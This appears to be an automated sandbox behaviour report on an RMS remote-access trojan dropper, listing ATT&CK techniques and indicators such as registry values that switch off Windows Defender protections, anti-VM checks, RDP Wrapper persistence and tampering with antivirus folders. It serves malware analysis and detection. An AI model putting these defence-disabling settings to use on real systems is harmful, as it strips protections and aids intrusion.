rms | d82d49e9ad153ef84670c1d0bde5f36b540d32fa037cca6127ce9e4e366b7403

Windows Service

Disable or Modify Tools

T1562.001

Processes:

Crack.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	Crack.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

T1562.001

Processes:

Crack.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Crack.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

unsecapp.exeunsecapp.exeSetup.exeCrack.exeupdate.exeIP.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Crack.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IP.exe

Drops file in Drivers directory 1 IoCs

Processes:

update.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts update.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

1708 netsh.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

pid	process
1708	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

RDPWinst.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWinst.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Setup.exeunsecapp.exeunsecapp.exeCrack.exeupdate.exeIP.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IP.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

install.exeupdate.exesvchost.exesmss.exewinserv.exewinserv.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 14 IoCs

Processes:

SoftwareInstall.exeinstall.exeCrack.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exeRDPWinst.exeunsecapp.exeunsecapp.exewinserv.exe

pid	process
6360	SoftwareInstall.exe
6428	install.exe
6576	Crack.exe
6624	update.exe
5132	win.exe
7136	svchost.exe
5676	IP.exe
5484	smss.exe
4600	winserv.exe
5172	winserv.exe
5348	RDPWinst.exe
440	unsecapp.exe
7040	unsecapp.exe
6664	winserv.exe

Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid process

5372 svchost.exe

pid	process
5372	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
6196	icacls.exe
1764	icacls.exe
3908	icacls.exe
7012	icacls.exe
3092	icacls.exe
6548	icacls.exe
3992	icacls.exe
5188	icacls.exe
5164	icacls.exe
6024	icacls.exe
5844	icacls.exe
6092	icacls.exe
5656	icacls.exe
4340	icacls.exe
1844	icacls.exe
6472	icacls.exe
5676	icacls.exe
4860	icacls.exe
5116	icacls.exe
6612	icacls.exe
6076	icacls.exe
6676	icacls.exe
724	icacls.exe
548	icacls.exe
5440	icacls.exe
3520	icacls.exe
5376	icacls.exe
6020	icacls.exe
4964	icacls.exe
5032	icacls.exe
4848	icacls.exe
6044	icacls.exe
5464	icacls.exe
1964	icacls.exe
1544	icacls.exe
6396	icacls.exe
852	icacls.exe
5876	icacls.exe
5508	icacls.exe
3792	icacls.exe
3400	icacls.exe
5976	icacls.exe
5044	icacls.exe
5780	icacls.exe
6344	icacls.exe
4904	icacls.exe
6728	icacls.exe
4612	icacls.exe
6816	icacls.exe
3696	icacls.exe
1216	icacls.exe
6864	icacls.exe
6572	icacls.exe
1088	icacls.exe
5416	icacls.exe
5932	icacls.exe
5272	icacls.exe
6076	icacls.exe
7036	icacls.exe
6232	icacls.exe
4232	icacls.exe
5504	icacls.exe
6508	icacls.exe
7120	icacls.exe

Themida packer 55 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/6292-2480-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2484-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2483-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2481-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2482-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2485-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2486-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2487-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2497-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2505-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
C:\ProgramData\Setup\Crack.exe	themida
behavioral1/memory/6576-2523-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2527-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2530-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2529-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2528-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2531-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2532-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2533-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6292-2535-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2538-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6576-2537-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6624-2540-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2541-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2544-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2545-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2546-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2547-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2548-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2550-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2551-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2553-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2554-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2556-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2557-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2567-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2580-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2584-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2594-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
C:\ProgramData\Setup\IP.exe	themida
behavioral1/memory/6624-2625-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/5676-2633-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2632-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2634-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2635-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2636-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2637-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2638-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/6292-2641-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2643-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/5676-2644-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\aut40F4.tmp	themida
behavioral1/memory/6292-2681-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2683-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2746-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

IP.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	IP.exe

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

unsecapp.exeunsecapp.exeCrack.exeupdate.exeIP.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Crack.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	update.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IP.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

160 ip-api.com

flow	ioc
160	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

Processes:

RDPWinst.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

AutoIT Executable 46 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/memory/6292-2484-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2483-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2482-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2485-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2486-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2487-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2497-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2505-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6576-2530-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2529-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2528-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2531-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2532-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2533-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6292-2535-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2538-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6576-2537-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6292-2541-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2545-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2546-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2547-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2548-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2550-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2551-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2553-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2554-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2556-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2557-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2567-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2580-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2584-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2594-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
C:\ProgramData\Setup\smss.exe	autoit_exe
behavioral1/memory/6624-2625-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/5676-2633-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2634-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2635-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2636-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2637-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2638-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/6292-2641-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2643-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/5676-2644-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/6292-2681-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2683-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2746-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

Processes:

RDPWinst.exeIP.exe

description	ioc	process
File created	C:\Windows\System32\rfxvmt.dll	RDPWinst.exe
File created	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File opened for modification	C:\Windows\SysWOW64\unsecapp.exe	IP.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

Setup.exeCrack.exeupdate.exeIP.exeunsecapp.exeunsecapp.exe

pid process

6292 Setup.exe
6576 Crack.exe
6624 update.exe
5676 IP.exe
440 unsecapp.exe
7040 unsecapp.exe

Drops file in Program Files directory 52 IoCs

Processes:

update.exesmss.exeRDPWinst.exe

description	ioc	process
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\Transmission	update.exe
File opened for modification	C:\Program Files\Common Files\AV	update.exe
File opened for modification	C:\Program Files\Ravantivirus	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files\HitmanPro	update.exe
File opened for modification	C:\Program Files\Bitdefender Agent	update.exe
File opened for modification	C:\Program Files\EnigmaSoft	update.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files\CPUID\HWMonitor	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	smss.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	smss.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files (x86)\MSI\MSI Center	update.exe
File opened for modification	C:\Program Files\QuickCPU	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\DrWeb	update.exe
File opened for modification	C:\Program Files\Rainmeter	update.exe
File opened for modification	C:\Program Files\Process Lasso	update.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files\Loaris Trojan Remover	update.exe
File opened for modification	C:\Program Files (x86)\SpeedFan	update.exe
File opened for modification	C:\Program Files (x86)\GPU Temp	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files (x86)\Moo0	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\NETGATE	update.exe
File opened for modification	C:\Program Files\ReasonLabs	update.exe
File opened for modification	C:\Program Files\Common Files\Doctor Web	update.exe
File opened for modification	C:\Program Files (x86)\IObit	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files (x86)\IObit\Advanced SystemCare	update.exe
File opened for modification	C:\Program Files (x86)\IObit\IObit Malware Fighter	update.exe
File opened for modification	C:\Program Files\RogueKiller	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\SUPERAntiSpyware	update.exe
File opened for modification	C:\Program Files (x86)\Wise	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Transmission	update.exe
File opened for modification	C:\Program Files\Process Hacker 2	update.exe

Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

6332 sc.exe
5792 sc.exe
6756 sc.exe
6196 sc.exe
6984 sc.exe
5180 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
6332	sc.exe
5792	sc.exe
6756	sc.exe
6196	sc.exe
6984	sc.exe
5180	sc.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

smss.exefirefox.exefirefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6732 schtasks.exe
1812 schtasks.exe
5388 schtasks.exe
5340 schtasks.exe
1572 schtasks.exe
6936 schtasks.exe
5608 schtasks.exe
6644 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5560 timeout.exe
564 timeout.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

SoftwareInstall.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Control Panel\International SoftwareInstall.exe

pid	process
6732	schtasks.exe
1812	schtasks.exe
5388	schtasks.exe
5340	schtasks.exe
1572	schtasks.exe
6936	schtasks.exe
5608	schtasks.exe
6644	schtasks.exe

pid	process
5560	timeout.exe
564	timeout.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\International	SoftwareInstall.exe

Modifies registry class 4 IoCs

Processes:

firefox.exesmss.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\MIME\Database	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	smss.exe

NTFS ADS 4 IoCs

Processes:

IP.exesmss.exefirefox.exe

description	ioc	process
File opened for modification	C:\ProgramData\Setup\winmgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\winmgmts:\	smss.exe
File opened for modification	C:\ProgramData\Setup\WinMgmts:\	IP.exe
File created	C:\Users\Admin\Downloads\john.zip:Zone.Identifier	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exeupdate.exewinserv.exeIP.exe

pid	process
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
5676	IP.exe
5676	IP.exe
5676	IP.exe
5676	IP.exe

